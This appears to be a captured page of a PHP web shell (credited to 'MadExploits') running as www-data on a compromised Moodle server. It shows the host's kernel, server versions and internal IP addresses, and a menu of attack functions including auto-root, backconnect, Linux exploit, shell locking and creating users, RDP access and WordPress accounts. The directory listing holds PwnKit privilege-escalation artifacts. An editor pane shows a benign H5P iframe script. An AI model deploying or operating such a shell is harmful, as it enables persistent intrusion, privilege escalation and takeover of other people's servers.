Linux moodl-moodle-3s8bw1nuh5yqd9-5b875fdd66-8hs4m 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64
Apache/2.4.41 (Ubuntu)
: 10.39.0.36 | : 10.36.0.0
Cant Read [ /etc/named.conf ]
7.4.3
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
moodledata /
filedir /
25 /
8e /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
.mad-root
0
B
-rw-r--r--
258ef74961bca6aeae728948eeb133...
2.66
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 258ef74961bca6aeae728948eeb133d6ad107fcd
var H5P = H5P || {}; H5P.IFrameEmbed = function (options, contentId) { var $ = H5P.jQuery; var $iframe = null; this.$ = $(this); options = H5P.jQuery.extend({ width: "500px", minWidth: "300px", height: "500px", source: "", resizeSupported: true }, options); if (!this instanceof H5P.IFrameEmbed){ return new H5P.IFrameEmbed(options, contentId); } this.attach = function ($wrapper) { // Set up an iframe with the correct source, and append // it to '$wrapper'. var iFrameSource = ''; if (options.source !== undefined) { if (options.source.trim().toLowerCase().substring(0, 4) === 'http') { iFrameSource = options.source; } else { iFrameSource = H5P.getContentPath(contentId) + '/' + options.source; } } $iframe = $('<iframe/>', { src: iFrameSource, scrolling: 'no', frameBorder: 0, 'class': 'h5p-iframe-content h5p-iframe-wrapper', css: { width: options.width, height: options.height, display: 'block' } }); $wrapper.html(''); $wrapper.append($iframe); if(options.resizeSupported === false) { /* Unfortunately fullscreen-button is not in DOM yet. * Therefore we need to remove it using a timer */ setTimeout(function () { $('.h5p-enable-fullscreen').hide(); }, 1); } this.$.trigger('resize'); }; this.resize = function () { // Set size of 'iframe' on startup, and when the browser // is resized, or enters fullscreen. if(options.resizeSupported) { $iframe.css( (H5P.isFullscreen) ? {width: '100%', height: '100%'} : getElementSize($iframe) ); } }; if (options.resizeSupported && this.on !== undefined) { this.on('resize', this.resize); } var getElementSize = function ($element) { // Get width of 'element' parent. Return width and height // so that 'element' scales (with the proper ratio) to fit // the parent. Make sure 'element' doesn't scale below // 'options.minWidth'. var elementMinWidth = parseInt(options.minWidth ,10); var elementSizeRatio = parseInt(options.height, 10) / parseInt(options.width, 10); var parentWidth = $element.parent().width(); var elementWidth = (parentWidth > elementMinWidth) ? parentWidth : elementMinWidth; return { width: elementWidth + 'px', height: elementWidth * elementSizeRatio + 'px' }; }; // This is a fix/hack to make touch work in iframe on mobile safari, // like if the iframe is listening to touch events on the iframe's // window object. (like in PHET simulations) window.addEventListener("touchstart", function () {}); };
Close